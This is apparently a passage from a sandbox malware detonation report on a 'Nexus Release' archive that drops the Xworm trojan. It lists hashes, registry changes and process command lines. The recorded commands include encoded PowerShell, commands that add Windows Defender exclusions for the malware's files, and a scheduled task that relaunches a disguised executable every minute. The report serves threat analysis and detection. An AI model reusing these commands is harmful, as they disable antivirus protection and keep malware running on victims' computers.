| SHA1 | 4a5fddd47812d19948585390f76d5435c4220e6b |
| SHA256 | ad9bcc0de6815516dfde91bb2e477f8fb5f099d7f5511d0f54b50fa77b721051 |
| SHA512 | 2c0d68da196075ea30d97b5fd853c673e28949df2b6bf005ae72fd8b60a0c036f18103c5de662cac63baaef740b65b4ed2394fcd2e6da4dfcfbeef5b64dab794 |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\charset_normalizer\md.pyd
| MD5 | f33ca57d413e6b5313272fa54dbc8baa |
| SHA1 | 4e0cabe7d38fe8d649a0a497ed18d4d1ca5f4c44 |
| SHA256 | 9b3d70922dcfaeb02812afa9030a40433b9d2b58bcf088781f9ab68a74d20664 |
| SHA512 | f17c06f4202b6edbb66660d68ff938d4f75b411f9fab48636c3575e42abaab6464d66cb57bce7f84e8e2b5755b6ef757a820a50c13dd5f85faa63cd553d3ff32 |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\_queue.pyd
| MD5 | c9ee37e9f3bffd296ade10a27c7e5b50 |
| SHA1 | b7eee121b2918b6c0997d4889cff13025af4f676 |
| SHA256 | 9ecec72c5fe3c83c122043cad8ceb80d239d99d03b8ea665490bbced183ce42a |
| SHA512 | c63bb1b5d84d027439af29c4827fa801df3a2f3d5854c7c79789cad3f5f7561eb2a7406c6f599d2ac553bc31969dc3fa9eef8648bed7282fbc5dc3fb3ba4307f |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\libcrypto-1_1.dll
| MD5 | 63c4f445b6998e63a1414f5765c18217 |
| SHA1 | 8c1ac1b4290b122e62f706f7434517077974f40e |
| SHA256 | 664c3e52f914e351bb8a66ce2465ee0d40acab1d2a6b3167ae6acf6f1d1724d2 |
| SHA512 | aa7bdb3c5bc8aeefbad70d785f2468acbb88ef6e6cac175da765647030734453a2836f9658dc7ce33f6fff0de85cb701c825ef5c04018d79fa1953c8ef946afd |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\_ssl.pyd
| MD5 | 11c5008e0ba2caa8adf7452f0aaafd1e |
| SHA1 | 764b33b749e3da9e716b8a853b63b2f7711fcc7c |
| SHA256 | bf63f44951f14c9d0c890415d013276498d6d59e53811bbe2fa16825710bea14 |
| SHA512 | fceb022d8694bce6504d6b64de4596e2b8252fc2427ee66300e37bcff297579cc7d32a8cb8f847408eaa716cb053e20d53e93fbd945e3f60d58214e6a969c9dd |
C:\Users\Admin\AppData\Local\Temp\onefile_3720_133626012097462060\_socket.pyd
| MD5 | 5dd51579fa9b6a06336854889562bec0 |
| SHA1 | 99c0ed0a15ed450279b01d95b75c162628c9be1d |
| SHA256 | 3669e56e99ae3a944fbe7845f0be05aea96a603717e883d56a27dc356f8c2f2c |
| SHA512 | 7aa6c6587890ae8c3f9a5e97ebde689243ac5b9abb9b1e887f29c53eef99a53e4b4ec100c03e1c043e2f0d330e7af444c3ca886c9a5e338c2ea42aaacae09f3e |
memory/1540-1159-0x0000000073670000-0x0000000073E20000-memory.dmp
memory/1164-1160-0x00000000075E0000-0x00000000075EE000-memory.dmp
memory/1164-1161-0x00000000075F0000-0x0000000007604000-memory.dmp
memory/1164-1162-0x00000000076D0000-0x00000000076EA000-memory.dmp
memory/1164-1163-0x00000000076C0000-0x00000000076C8000-memory.dmp
memory/1164-1165-0x0000000073670000-0x0000000073E20000-memory.dmp
memory/3580-1166-0x000002B430F70000-0x000002B4310EB000-memory.dmp
memory/1612-1172-0x00000156F90A0000-0x00000156F90C2000-memory.dmp
memory/3580-1177-0x000002B430F70000-0x000002B4310EB000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-06-11 17:39
Reported
2024-06-11 17:42
Platform
win10v2004-20240508-en
Max time kernel
51s
Max time network
52s
Command Line
Signatures
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\Nexus Release\license.txt"
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-11 17:39
Reported
2024-06-11 17:42
Platform
win7-20240221-en
Max time kernel
118s
Max time network
126s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2320 wrote to memory of 2588 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
| PID 2320 wrote to memory of 2588 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
| PID 2320 wrote to memory of 2588 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Nexus Release.rar"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Nexus Release.rar"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-11 17:39
Reported
2024-06-11 17:46
Platform
win10v2004-20240226-en
Max time kernel
351s
Max time network
357s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zO06029158\Nexus Release V1.5.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO06029158\Nexus Release V1.5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Runtime.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Runtime.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Runtime.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Runtime.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Runtime.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Runtime.exe | N/A |
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Runtime = "C:\\ProgramData\\Windows Runtime.exe" | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Nexus Release.rar"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Nexus Release.rar"
C:\Users\Admin\AppData\Local\Temp\7zO06029158\Nexus Release V1.5.exe
"C:\Users\Admin\AppData\Local\Temp\7zO06029158\Nexus Release V1.5.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGMAbABkACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBuAGUAeAB1AHMAbABvAGEAZABlAHIAIABSAHUAbgAgAEEAcwAgAEEAZABtAGkAbgAgAEkAZgAgAEkAbgBqAGUAYwB0AGkAbwBuACAARgBhAGkAbABzACcALAAnACcALAAnAE8ASwAnACwAJwBXAGEAcgBuAGkAbgBnACcAKQA8ACMAdwBmAGMAIwA+AA=="
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAZABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcwB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAbABpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBlACMAPgA="
C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Users\Admin\AppData\Local\dllhost.exe
"C:\Users\Admin\AppData\Local\dllhost.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_3532_133626012310114217\nexus.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3948 --field-trial-handle=2656,i,16940681401824032220,151921362336696246,262144 --variations-seed-version /prefetch:8
C:\ProgramData\Windows Runtime.exe
"C:\ProgramData\Windows Runtime.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5036.0.604749332\2021032944" -parentBuildID 20221007134813 -prefsHandle 1884 -prefMapHandle 1876 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd8f4009-0e53-4b58-8f02-b53f4cdb42b9} 5036 "\\.\pipe\gecko-crash-server-pipe.5036" 1964 2b3aeef6158 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5036.1.1237630913\990609611" -parentBuildID 20221007134813 -prefsHandle 2352 -prefMapHandle 2340 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {159ddc63-cd26-4fac-9a45-258c281ffe25} 5036 "\\.\pipe\gecko-crash-server-pipe.5036" 2364 2b3ae833558 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5036.2.975661154\1526704017" -childID 1 -isForBrowser -prefsHandle 3172 -prefMapHandle 3168 -prefsLen 20888 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {550b61b6-bf1b-4c3c-aa1b-5e675cf96fbf} 5036 "\\.\pipe\gecko-crash-server-pipe.5036" 3184 2b3b2db0258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5036.3.692389746\1724208927" -childID 2 -isForBrowser -prefsHandle 3608 -prefMapHandle 3604 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6790311c-772c-4b0c-9158-ca5868f41706} 5036 "\\.\pipe\gecko-crash-server-pipe.5036" 3620 2b3a245d958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5036.4.438936832\1632862223" -childID 3 -isForBrowser -prefsHandle 4164 -prefMapHandle 4152 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6fbd60dc-8882-4095-bb64-7fff81c145bd} 5036 "\\.\pipe\gecko-crash-server-pipe.5036" 4104 2b3b4c0b458 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5036.5.848401884\464647260" -childID 4 -isForBrowser -prefsHandle 5052 -prefMapHandle 5032 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {096aff5b-c7c2-47e8-984f-5afc74e13e1d} 5036 "\\.\pipe\gecko-crash-server-pipe.5036" 5036 2b3b4086658 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5036.6.728457764\1319917462" -childID 5 -isForBrowser -prefsHandle 5196 -prefMapHandle 5200 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2007c0cf-fc3a-4713-bb3c-ffd8b8509ce2} 5036 "\\.\pipe\gecko-crash-server-pipe.5036" 5076 2b3b4f48758 tab
C:\Program Files\Mozilla Firefox\firefox.exe
